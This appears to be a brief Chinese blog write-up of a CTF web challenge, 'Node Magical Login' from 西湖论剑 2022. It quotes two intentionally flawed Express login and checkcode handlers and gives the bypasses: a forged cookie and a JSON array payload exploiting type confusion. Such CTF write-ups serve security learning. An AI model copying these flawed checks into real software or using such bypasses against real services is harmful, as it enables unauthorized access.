[西湖论剑 2022]Node Magical Login

最新推荐文章于 2024-10-18 17:51:23 发布

ha0cker

最新推荐文章于 2024-10-18 17:51:23 发布

阅读量315

点赞数

文章标签： javascript 前端开发语言 web安全

本文链接：https://blog.csdn.net/m0_70819573/article/details/130108107

版权

该文章讨论了两个Web路由的安全机制。在/flag1路由中，登录控制器要求用户名为admin且密码匹配随机字符串，否则返回401错误。然而，用户可以使用预设的Cookieadmin直接访问。在/flag2路由，检查控制器期望16位的checkcode，但可以通过传递数组绕过检查，揭示了潜在的安全漏洞。

摘要由CSDN通过智能技术生成

1.路由/flag1:

function LoginController(req,res) {
    try {
        const username = req.body.username
        const password = req.body.password
        if (username !== "admin" || password !== Math.random().toString()) {
            res.status(401).type("text/html").send("Login Failed")
        } else {
            res.cookie("user",SECRET_COOKIE)
            res.redirect("/flag1")
        }
    } catch (__) {}
}

传入Cookie:user=admin

2.路由/flag2

function CheckController(req,res) {
    let checkcode = req.body.checkcode?req.body.checkcode:1234;
    console.log(req.body)
    if(checkcode.length === 16){
        try{
            checkcode = checkcode.toLowerCase()
            if(checkcode !== "aGr5AtSp55dRacer"){
                res.status(403).json({"msg":"Invalid Checkcode1:" + checkcode})
            }
        }catch (__) {}
        res.status(200).type("text/html").json({"msg":"You Got Another Part Of Flag: " + flag2.toString().trim()})
    }else{
        res.status(403).type("text/html").json({"msg":"Invalid Checkcode2:" + checkcode})
    }
}

传入数组绕过

payload:

{"checkcode":["aGr5AtSp55dRacer",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]}